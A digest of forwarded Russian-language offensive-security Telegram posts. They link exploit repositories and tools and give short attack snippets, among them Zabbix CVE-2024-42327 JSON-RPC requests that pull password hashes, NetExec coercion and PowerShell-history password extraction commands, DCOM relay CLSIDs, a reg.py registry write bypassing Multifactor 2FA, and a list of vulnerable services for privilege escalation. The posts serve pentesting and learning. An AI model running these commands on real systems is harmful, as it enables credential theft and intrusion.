Forwarded from Ralf Hacker Channel (Ralf Hacker)
Форк знаменитой утилиты certipy with many open pull requests merged, made compatible with each other, and tested
https://github.com/zimedev/certipy-merged
P.S. главное, что tested...
#soft #pentest #adcs #ad
https://github.com/zimedev/certipy-merged
Missing PRs:
211: fix ESC1 false positive
229: add smime extensions support (somehow does not work completely with certipy auth)
Merged PRs:
231: add ldap simple auth
228: add ESC15
226: fix ESC1 false positive
225: fix to solve SID overwrite errors
222: fix to allow certificate names with slashes or parentheses
210: add cross domain authentication
209: accept tgs other than HOST/target@domain
203: check web enrollment for https
201: add dcom support
200: add possibility to add more than 1 keycredential and correctly list them
198: add ldap-port option
196: add ESC13
193: add whencreated and whenmodified for templates
183: hidden import (pycryptodomex)
P.S. главное, что tested...
#soft #pentest #adcs #ad
GitHub
GitHub - zimedev/certipy-merged: Tool for Active Directory Certificate Services enumeration and abuse
Tool for Active Directory Certificate Services enumeration and abuse - zimedev/certipy-merged
🥱2
Forwarded from APT
📜 ADCS Attack Techniques Cheatsheet
This is a handy table outlining the various methods of attack against Active Directory Certificate Services (ADCS)
🔗 Source:
https://docs.google.com/spreadsheets/d/1E5SDC5cwXWz36rPP_TXhhAvTvqz2RGnMYXieu4ZHx64/edit?gid=0#gid=0
#ad #adcs #esc #cheatsheet
This is a handy table outlining the various methods of attack against Active Directory Certificate Services (ADCS)
🔗 Source:
https://docs.google.com/spreadsheets/d/1E5SDC5cwXWz36rPP_TXhhAvTvqz2RGnMYXieu4ZHx64/edit?gid=0#gid=0
#ad #adcs #esc #cheatsheet
Google Docs
ADCS Attack Techniques Cheatsheet
🥱2
Forwarded from Offensive Xwitter
😈 [ ap @decoder_it ]
M'm glad to release the tool I have been working hard on the last month: #KrbRelayEx
A Kerberos relay & forwarder for MiTM attacks!
>Relays Kerberos AP-REQ tickets
>Manages multiple SMB consoles
>Works on Win& Linux with .NET 8.0
>...
GitHub:
🔗 https://github.com/decoder-it/KrbRelayEx
🐥 [ tweet ]
M'm glad to release the tool I have been working hard on the last month: #KrbRelayEx
A Kerberos relay & forwarder for MiTM attacks!
>Relays Kerberos AP-REQ tickets
>Manages multiple SMB consoles
>Works on Win& Linux with .NET 8.0
>...
GitHub:
🔗 https://github.com/decoder-it/KrbRelayEx
🐥 [ tweet ]
🥱1
Forwarded from Path Secure (CuriV)
Хей, хей!
Статья-рефлексия по итогам OSCP c пылу с жару на Хабр.
Получилась довольно хорошо. Рад, что удалось добраться и зафиксировать свой опыт. Содержание статьи:
1. Введение
2. Подготовка
3. Первая попытка
4. Вторая попытка
5. Заключение
6. Конспект обработанных рекомендаций из разных видео по OSCP
Еще загрузил свой читшит. Туда же положу шаблон отчета в формате markdown:
https://github.com/curiv/oscp-cheatsheet
Буду очень рад реакциям, репостам, комментариям и вопросам. Стрим с раззбором все ещё в силе. Заранее сделаю анонс
#certification #oscp #article
Статья-рефлексия по итогам OSCP c пылу с жару на Хабр.
Получилась довольно хорошо. Рад, что удалось добраться и зафиксировать свой опыт. Содержание статьи:
1. Введение
2. Подготовка
3. Первая попытка
4. Вторая попытка
5. Заключение
6. Конспект обработанных рекомендаций из разных видео по OSCP
Еще загрузил свой читшит. Туда же положу шаблон отчета в формате markdown:
https://github.com/curiv/oscp-cheatsheet
Буду очень рад реакциям, репостам, комментариям и вопросам. Стрим с раззбором все ещё в силе. Заранее сделаю анонс
#certification #oscp #article
Хабр
Системный подход к успешной сдаче OSCP 2024
Введение Широко известная в узких кругах организация «Offensive Security» является флагманом в области кибербезопасности, предлагая специалистам уникальные образовательные программы и сертификационные...
❤2🙈2🥴1🙉1🙊1
Forwarded from Offensive Xwitter
😈 [ drm @lowercase_drm ]
Coffee break thoughts: "is it possible to bruteforce RPC endpoint to perform code exec if you can't access EPM/SMB?"
99% impacket atexec + 1% "for loop" = 100% prod ready
(silent command only)
h/t @saerxcit
🌻
🔗 https://gist.github.com/ThePirateWhoSmellsOfSunflowers/3673746454aef7d55a5efed4dc4e1a61
🐥 [ tweet ]
Coffee break thoughts: "is it possible to bruteforce RPC endpoint to perform code exec if you can't access EPM/SMB?"
99% impacket atexec + 1% "for loop" = 100% prod ready
(silent command only)
h/t @saerxcit
🌻
🔗 https://gist.github.com/ThePirateWhoSmellsOfSunflowers/3673746454aef7d55a5efed4dc4e1a61
🐥 [ tweet ]
🤔1🙈1🙉1🙊1
Forwarded from Offensive Xwitter
😈 [ ap @decoder_it ]
OK, I promise to stop spamming about relays with NTLM/Kerberos 😅. But if you're a member of the Distributed COM or Performance Log group, these juicy CLSIDs let you trigger remotely machine authentication of any computer, including DCs, and relay DCOM -> HTTP, SMB:
🐥 [ tweet ]
OK, I promise to stop spamming about relays with NTLM/Kerberos 😅. But if you're a member of the Distributed COM or Performance Log group, these juicy CLSIDs let you trigger remotely machine authentication of any computer, including DCs, and relay DCOM -> HTTP, SMB:
{9EA82395-E31B-41CA-8DF7-EC1CEE7194DF}
{42C21DF5-FB58-4102-90E9-96A213DC7CE8}
{C63261E4-6052-41FF-B919-496FECF4C4E5}
{FFE1E5FE-F1F0-48C8-953E-72BA272F2744}🐥 [ tweet ]
🙈3🙉3🙊3
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-38193: Windows LPE
PATCHED: August 13, 2024
https://github.com/Nephster/CVE-2024-38193
P.S. Протестил на Win11, работает
#git #exploit #lpe #pentest #redteam
PATCHED: August 13, 2024
https://github.com/Nephster/CVE-2024-38193
P.S. Протестил на Win11, работает
#git #exploit #lpe #pentest #redteam
❤2🤯1
Forwarded from Укротитель змей
CVE-2024-42327 в Zabbix
1 декабря наткнулся на уязвимость CVE-2024-42327 и решил ее изучить, прочитав пару постов, было сказано, что злоумышленник может внедрять произвольные
CVE-2024-42327 - это крит уязвимость (CVSS 9.9), связанная с
Результаты запроса включают:
Имя пользователя (username),
Имя (name) и фамилию (surname),
Идентификатор пользователя (userid),
Хэш пароля (passwd)
Внутри исходника присутствует аргумент
в PoC запускается скрипт cve-2024-42327.py и в нем присутствуют важные этапы.
Первый этап: Аутентификация через API
Метод
После этого сервер возвращает токен
Второй этап: Перебор идентификаторов пользователей. После получения токена, скрипт вызывает метод
В ответе возвращаются данные с хэшированным паролем
Чтобы провернуть эту схему, нужно иметь доступ к
И учетка с минимальными правами, которая может дернуть метод
Уязвимые версии:
PoC
1 декабря наткнулся на уязвимость CVE-2024-42327 и решил ее изучить, прочитав пару постов, было сказано, что злоумышленник может внедрять произвольные
SQL запросы. Нашел PoC и немного удивился, провел ресерч и ничего общего с SQLi не увидел. Давайте разберемся, о чем же эта бага. CVE-2024-42327 - это крит уязвимость (CVSS 9.9), связанная с
JSON-RPC API Zabbix. Она позволяет хакеру с минимальными правами (пользователь с доступом к API) извлекать конфиденциальные данные о других учетных записях, включая имена, фамилии, идентификаторы и хэшированные пароли. Проблема кроется в неправильной проверке авторизации и прав доступа, а не в манипуляции SQL запросами. Уязвимость базируется на логической ошибке в реализации API. Метод user.get предоставляет доступ к данным, которые не должны быть видны пользователю с минимальными правами. Злоумышленник использует легитимные методы API, такие как user.login и user.get. Запросы передаются в формате JSON, и сервер возвращает ответ.Результаты запроса включают:
Имя пользователя (username),
Имя (name) и фамилию (surname),
Идентификатор пользователя (userid),
Хэш пароля (passwd)
Внутри исходника присутствует аргумент
selectRole в запросе API и может создать впечатление работы с SQL запросами, так как он содержит поля, такие как roleid и u.passwd. Однако это параметры API, а не запросы к БД.в PoC запускается скрипт cve-2024-42327.py и в нем присутствуют важные этапы.
Первый этап: Аутентификация через API
Метод
user.login используется для получения токена сессии, необходимого для выполнения запросов.{
"jsonrpc": "2.0",
"method": "user.login",
"params": {
"username": "guest",
"password": "guest_password"
},
"id": 1
}После этого сервер возвращает токен
{
"jsonrpc": "2.0",
"result": "a43530e0eff1f1ce828cc04dca95eb14",
"id": 1
}Второй этап: Перебор идентификаторов пользователей. После получения токена, скрипт вызывает метод
user.get, перебирай ID пользователей{
"jsonrpc": "2.0",
"method": "user.get",
"params": {
"selectRole": ["roleid, u.passwd", "roleid"],
"userids": "1"
},
"auth": "a43530e0eff1f1ce828cc04dca95eb14",
"id": 1
}В ответе возвращаются данные с хэшированным паролем
{
"jsonrpc": "2.0",
"result": [
{
"userid": "1",
"username": "Admin",
"name": "Zabbix",
"surname": "Administrator",
"passwd": "$2y$10$92nDno4n0Zm7Ej7Jfsz8WukBfgSS/U0QkIuu8WkJPihXBb2A1UrEK"
}
],
"id": 1
}Чтобы провернуть эту схему, нужно иметь доступ к
JSON-RPC API Zabbix, чаще всего у него такой эндпоинт.http://zabbix/api_jsonrpc.php
И учетка с минимальными правами, которая может дернуть метод
user.login.Уязвимые версии:
Zabbix 6.0.0–6.0.31
Zabbix 6.4.0–6.4.16
Zabbix 7.0.0.
cve-2024-42327.py -u http://zabbix/api_jsonrpc.php -n Vanya -p Qwerty123
PoC
❤2👍1🔥1😁1
Forwarded from HaHacking
adb, appcache, avi, awk, bat, bf, bmp, bpg, bz2, c, chicken, chm, class, clj, cljc, cljs, clp, cob, coffee, com, cpp, cr, cs, css, dcm, dol, e, ex, exe, f, f90, flv, gif, go, groovy, gz, h, heif, hs, html, i, i7x, icc, ico, inf, java, jp2, jpg, js, json, jsonp, jxl, lua, m, macho, macho-ml, malbolge, md, ml, mng, mp3, mp4, ni, nim, o, opa, pas, pbm, pdf, pgm, php, pl, pml, png, ppm, py, rar, rb, rs, rtf, scala, sh, svg, swf, swift, t, tar, tga, tif, toml, ts, vs, wasm, wav, webm, webp, wmf, wmv, ws, xbm, xhtml, xml, yml, zip
ada.adb, manifest.appcache, AudioVideoInterleave.avi, awk.awk, batch.bat, brainfuck.bf, bmp.bmp, bpg.bpg, bzip2.bz2, c.c, chicken.chicken, compiledhtml.chm, java-class.class, clojure.clj, clojure.cljc, clojurescript.cljs, jess.clp, cobol.cob, coffeescript.coffee, doscommand-empty.com, doscommand.com, cpp.cpp, crystal.cr, csharp.cs, css.css, dicom.dcm, dolphin.dol, eiffel.e, elixir.ex, dosexecutable.exe, linearexecutable.exe, newexecutable.exe, portableexecutable-xp.exe, portableexecutable.exe, fortran-77.f, fortran-90.f90, FlashVideo.flv, gif-transparent.gif, gif.gif, go.go, groovy.groovy, gzip-name.gz, gzip.gz, c.h, heif.heif, haskell_loop.hs, haskell_term.hs, html-2.0.html, html-3.2.html, html-4.0-strict.html, html-4.01-frameset.html, html-4.01-strict.html, html-4.01-transitional.html, html5.html, iso-html.html, xhtml-1.0-frameset.html, intercal.i, i.i7x, icc.icc, ico.ico, inform-6.inf, java.java, jpeg2.jp2, jpeg.jpg, javascript.js, json.json, json-p.jsonp, jxl.jxl, lua.lua, objective-c.m, macho, macho-ml, malbolge.malbolge, markdown.md, ocaml.ml, mng.mng, mp3.mp3, Mpeg4.mp4, mp4-with-audio.mp4, story.ni, nim.nim, elf.o, opa.opa, pascal.pas, pbm.pbm, pbmb.pbm, pdf.pdf, pgm.pgm, pgmb.pgm, php.php, perl.pl, promela.pml, png-transparent.png, png-truncated.png, ppm.ppm, ppmb.ppm, python.py, rar14.rar, rar4.rar, rar5.rar, ruby.rb, rust.rs, rtf.rtf, scala.scala, shell.sh, svg.svg, flash.swf, swift.swift, tads-3.t, tar.tar, targa.tga, tiff.tif, toml.toml, typescript.ts, vertex-shader.vs, webassembly.wasm, wav.wav, webm.webm, webp.webp, WindowsMetafile.wmf, WindowsMediaVideo.wmv, whitespace.ws, x-bitmap.xbm, xhtml-1.0-strict.xhtml, xhtml-1.1.xhtml, xhtml-basic-1.0.xhtml, xhtml-basic-1.1.xhtml, xhtml5.xhtml, xml-1.0-valid.xml, xml-1.0.xml, xml-1.1-valid.xml, xml-1.1.xml, yaml.yml, zip.zipPNG формата минимального размера;▪️ PNG изображение6_132_534байта (5.8 Мб)▪️ 225_000×225_000пикселей▪️ при представлении в качестве буфера пикселей по 3 байта / пиксель➡️ 141.4 Гб
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from haxx
🛠 Как-то незаметно прошел релиз NetExec 1.3.0, а туда тем временем добавили несколько интересных вещей.
Вывод инфы по доступным интерфейсам, так что поиск пивота стал гораздо приятнее.
Проверка на всякие Coerce штуки (PetitPotam, DFSCoerce, PrinterBug, MSEven, ShadowCoerce). Подробнее тут
Энум SCCM через LDAP (RECON-1) . Подробнее тут
Извлечение паролей из истории команд PowerShell
Статус Bitlocker по дискам
В общем, есть с чем поиграться. Более подробно можно посмотреть тут или тут
Вывод инфы по доступным интерфейсам, так что поиск пивота стал гораздо приятнее.
nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' --interfaces
Проверка на всякие Coerce штуки (PetitPotam, DFSCoerce, PrinterBug, MSEven, ShadowCoerce). Подробнее тут
nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M coerce_plus
Энум SCCM через LDAP (RECON-1) . Подробнее тут
nxc ldap 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M sccm -o REC_RESOLVE=TRUE
Извлечение паролей из истории команд PowerShell
nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M powershell_history -o export=True
Статус Bitlocker по дискам
nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M bitlocker
nxc wmi 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M bitlocker
В общем, есть с чем поиграться. Более подробно можно посмотреть тут или тут
🔥1
Forwarded from Kali Linux
🔥 Вышел Kali Linux 2024.4 – последняя версия этого года.
В обновленной версии добавлены 14 новых инструментов, внесены различные улучшения, а также прекращена поддержка некоторых старых функций.
Выпущена последняя в этом году версия Kali Linux.
В ней представлено 14 новых инструментов, множество улучшений, а также объявлено об отказе от поддержки некоторых устаревших функций.
Данный релиз включает обновление ядра Linux до версии 6.11, GNOME 47, улучшение совместимости с Raspberry Pi, переход на новую версию Python по умолчанию, а также информацию о прекращении выпуска сборок для архитектуры i386.
Решение отказаться от образов для i386 связано с тем, что Debian, на основе которого построена Kali, прекратил поддержку 32-битных сборок в октябре этого года.
Несмотря на это, поскольку 32-битные программы всё ещё могут работать под
Кроме того, в Kali Linux 2024.4 в качестве стандартной версии Python используется 3.12, а использование команды pip для установки пакетов по умолчанию запрещено. Как было объяснено ранее в Offensive Security, выполнение pip с правами root для установки глобальных пакетов может привести к конфликтам с внутренним менеджером пакетов, таким как apt. Для тех, кто хочет использовать аналог pip, в Kali теперь предлагается команда pipx.
Ещё одно важное изменение касается устаревания ключей SSH DSA, так как Kali Linux 2024.4 использует OpenSSH версии 9.8p1. Для пользователей, которым требуется поддержка этих ключей для работы со старыми системами, включён клиент SSH1, который, по словам разработчиков, остаётся на версии 7.5.
Разработчики предупреждают, что инструменты, не знающие команду ssh1, могут столкнуться с проблемами при работе с устаревшими системами, использующими ключи DSA.
Помимо прочего, в новой версии значительно улучшили поддержку Raspberry Pi, добавив утилиту Raspberry Pi Imager. Она помогает найти подходящие образы для Raspberry Pi и легко записать их на карту microSD. В Kali Linux 2024.4 доступен imager для предварительной настройки параметров, которые затем применяются к образу Kali Linux для Raspberry Pi при его записи на microSD.
📌 Скачать
@linuxkalii
В обновленной версии добавлены 14 новых инструментов, внесены различные улучшения, а также прекращена поддержка некоторых старых функций.
Выпущена последняя в этом году версия Kali Linux.
В ней представлено 14 новых инструментов, множество улучшений, а также объявлено об отказе от поддержки некоторых устаревших функций.
Данный релиз включает обновление ядра Linux до версии 6.11, GNOME 47, улучшение совместимости с Raspberry Pi, переход на новую версию Python по умолчанию, а также информацию о прекращении выпуска сборок для архитектуры i386.
Решение отказаться от образов для i386 связано с тем, что Debian, на основе которого построена Kali, прекратил поддержку 32-битных сборок в октябре этого года.
Несмотря на это, поскольку 32-битные программы всё ещё могут работать под
x86-64, разработчики Offensive Security решили оставить пакеты i386 в дистрибутиве.Кроме того, в Kali Linux 2024.4 в качестве стандартной версии Python используется 3.12, а использование команды pip для установки пакетов по умолчанию запрещено. Как было объяснено ранее в Offensive Security, выполнение pip с правами root для установки глобальных пакетов может привести к конфликтам с внутренним менеджером пакетов, таким как apt. Для тех, кто хочет использовать аналог pip, в Kali теперь предлагается команда pipx.
Ещё одно важное изменение касается устаревания ключей SSH DSA, так как Kali Linux 2024.4 использует OpenSSH версии 9.8p1. Для пользователей, которым требуется поддержка этих ключей для работы со старыми системами, включён клиент SSH1, который, по словам разработчиков, остаётся на версии 7.5.
Разработчики предупреждают, что инструменты, не знающие команду ssh1, могут столкнуться с проблемами при работе с устаревшими системами, использующими ключи DSA.
Помимо прочего, в новой версии значительно улучшили поддержку Raspberry Pi, добавив утилиту Raspberry Pi Imager. Она помогает найти подходящие образы для Raspberry Pi и легко записать их на карту microSD. В Kali Linux 2024.4 доступен imager для предварительной настройки параметров, которые затем применяются к образу Kali Linux для Raspberry Pi при его записи на microSD.
📌 Скачать
@linuxkalii
🤯1
Forwarded from RedTeam brazzers (Pavel Shlundin)
Всё чаще на проектах встречаю 2FA на критичных серверах , на которые хочется войти именно по RDP, например, Kaspersky Security Center. Наиболее популярное решение, встречаемое мною, это Multifactor. На одном из последних проектов с коллегой мы попали как раз в такую ситуацию - у нас уже были права админа домена, но по RDP не зайти, пришлось искать пути обхода.
А ларчик то просто открывался. Идём на сайт продукта в раздел документации и видим интересный параметр NetworkBypassList. Да, все верно, он определяет с каких ip можно ходить, игнорируя 2FA.
С помощью reg.py можем записать в реестр на нужном сервере исключение и без проблем подключиться игнорируя Multifactor.
Мораль: очень часто не нужны глубокие ресерчи, а просто достаточно почитать документацию :)
А ларчик то просто открывался. Идём на сайт продукта в раздел документации и видим интересный параметр NetworkBypassList. Да, все верно, он определяет с каких ip можно ходить, игнорируя 2FA.
С помощью reg.py можем записать в реестр на нужном сервере исключение и без проблем подключиться игнорируя Multifactor.
reg.py domain.local/pentest@ksc01 -k -no-pass add -keyName 'HKCR\CLSID\{7a6b350e-2fb5-4b07-bcc2-7413ced94def}' -v 'NetworkBypassList' -vt REG_SZ -vd 10.10.10.11,10.10.8.22Мораль: очень часто не нужны глубокие ресерчи, а просто достаточно почитать документацию :)
😁1
Forwarded from Offensive Xwitter
😈 [ Alex Neff @al3x_n3ff ]
A lot of cool new features for the MSSQL protocol just got merged into NetExec🔥
- RID brute forcing, made by @Adamkadaban
- MSSQL coercion, made by @lodos2005
- 6 new modules abusing MSSQL trusted links, made by deathflamingo
🐥 [ tweet ]
A lot of cool new features for the MSSQL protocol just got merged into NetExec🔥
- RID brute forcing, made by @Adamkadaban
- MSSQL coercion, made by @lodos2005
- 6 new modules abusing MSSQL trusted links, made by deathflamingo
🐥 [ tweet ]
Forwarded from RedTeam brazzers (Миша)
Всем привет!
Помимо стандартных компонентов Windows, на системе могут работать службы от сторонних поставщиков: системы слежения, настройки, управления, игрушки. В большинстве своем они также предоставляют опасность, работая от лица
Причем, как я понимаю, подобные службы обновляться должны самостоятельно с помощью соответствующего фирменного ПО, что усложняет процесс управления уязвимостями и потенциально дает нам еще один вектор повышения привилегий.
Есть достаточно много способов сбора информации о ПО на системе:
Хочу поделиться с вами небольшим списочком уязвимых служб, которые могут помочь взять систему на конечной тачке. Однозначно нужно интегрировать этот список в репозиторий Exploit-Street, но я что-то не могу придумать как. Может быть у вас есть идеи?
ManageEngine ServiceDesk
- https://github.com/horizon3ai/CVE-2021-44077
ManageEngine ADSelfService
- https://github.com/synacktiv/CVE-2021-40539
- CVE-2022-47966
- CVE-XXXX-XXXX (с версии ADSelfService Plus 4.2.9, 2012 и до версии 6.3 Build 6301)
UserManager
- CVE-2023-36047
ITunes
- CVE-2024-44193
Razer ( до 3.7.1209.121307)
- RazerEoP
Datacard XPS Card Printer Driver
- CVE-2024-34329
AppGate
- CVE-2019-19793
Seagate
- CVE-2022-40286
AWS VPN Client
- CVE-2022-25165
AIDA (уязвимы версии ниже 7.00.6742)
- AIDA64DRIVER-EOP
VboxSDS
- CVE-2024-21111
TeamViewer
- CVE-2024-7479 CVE-2024-7481
GamingService от XBOX
- GamingServiceEoP
- GamingServiceEoP5
Chrome Updater
- CVE-2023-7261
Plantronics Desktop Hub
- CVE-2024-27460
Помимо стандартных компонентов Windows, на системе могут работать службы от сторонних поставщиков: системы слежения, настройки, управления, игрушки. В большинстве своем они также предоставляют опасность, работая от лица
NT AUTHORITY\SYSTEM. Причем, как я понимаю, подобные службы обновляться должны самостоятельно с помощью соответствующего фирменного ПО, что усложняет процесс управления уязвимостями и потенциально дает нам еще один вектор повышения привилегий.
Есть достаточно много способов сбора информации о ПО на системе:
# Извлечение из реестра
Get-ChildItem "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | Get-ItemProperty | Where-Object {$_.DisplayName -ne $null} | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
# wmi
wmic product get name,version,vendor
# Seatbelt
.\SeatBelt.exe InstalledProducts
Хочу поделиться с вами небольшим списочком уязвимых служб, которые могут помочь взять систему на конечной тачке. Однозначно нужно интегрировать этот список в репозиторий Exploit-Street, но я что-то не могу придумать как. Может быть у вас есть идеи?
ManageEngine ServiceDesk
- https://github.com/horizon3ai/CVE-2021-44077
ManageEngine ADSelfService
- https://github.com/synacktiv/CVE-2021-40539
- CVE-2022-47966
- CVE-XXXX-XXXX (с версии ADSelfService Plus 4.2.9, 2012 и до версии 6.3 Build 6301)
UserManager
- CVE-2023-36047
ITunes
- CVE-2024-44193
Razer ( до 3.7.1209.121307)
- RazerEoP
Datacard XPS Card Printer Driver
- CVE-2024-34329
AppGate
- CVE-2019-19793
Seagate
- CVE-2022-40286
AWS VPN Client
- CVE-2022-25165
AIDA (уязвимы версии ниже 7.00.6742)
- AIDA64DRIVER-EOP
VboxSDS
- CVE-2024-21111
TeamViewer
- CVE-2024-7479 CVE-2024-7481
GamingService от XBOX
- GamingServiceEoP
- GamingServiceEoP5
Chrome Updater
- CVE-2023-7261
Plantronics Desktop Hub
- CVE-2024-27460
GitHub
GitHub - MzHmO/Exploit-Street: Complete list of LPE exploits for Windows (starting from 2023)
Complete list of LPE exploits for Windows (starting from 2023) - MzHmO/Exploit-Street
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Forwarded from Offensive Xwitter
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ MrAle98 @MrAle_98 ]
Finally finished to develop an exploit for CVE-2024-49138: vulnerability in CLFS.sys.
I'll provide a detailed analysis in a blog post.
🔗 https://github.com/MrAle98/CVE-2024-49138-POC
🐥 [ tweet ]
Finally finished to develop an exploit for CVE-2024-49138: vulnerability in CLFS.sys.
I'll provide a detailed analysis in a blog post.
🔗 https://github.com/MrAle98/CVE-2024-49138-POC
🐥 [ tweet ]
Forwarded from Волосатый бублик
[ Microsoft Configuration Manager 2403 Unauthenticated SQL injections ]
https://www.synacktiv.com/advisories/microsoft-configuration-manager-configmgr-2403-unauthenticated-sql-injections
Exploitation code is available at https://github.com/synacktiv/CVE-2024-43468
https://www.synacktiv.com/advisories/microsoft-configuration-manager-configmgr-2403-unauthenticated-sql-injections
Exploitation code is available at https://github.com/synacktiv/CVE-2024-43468
🤯1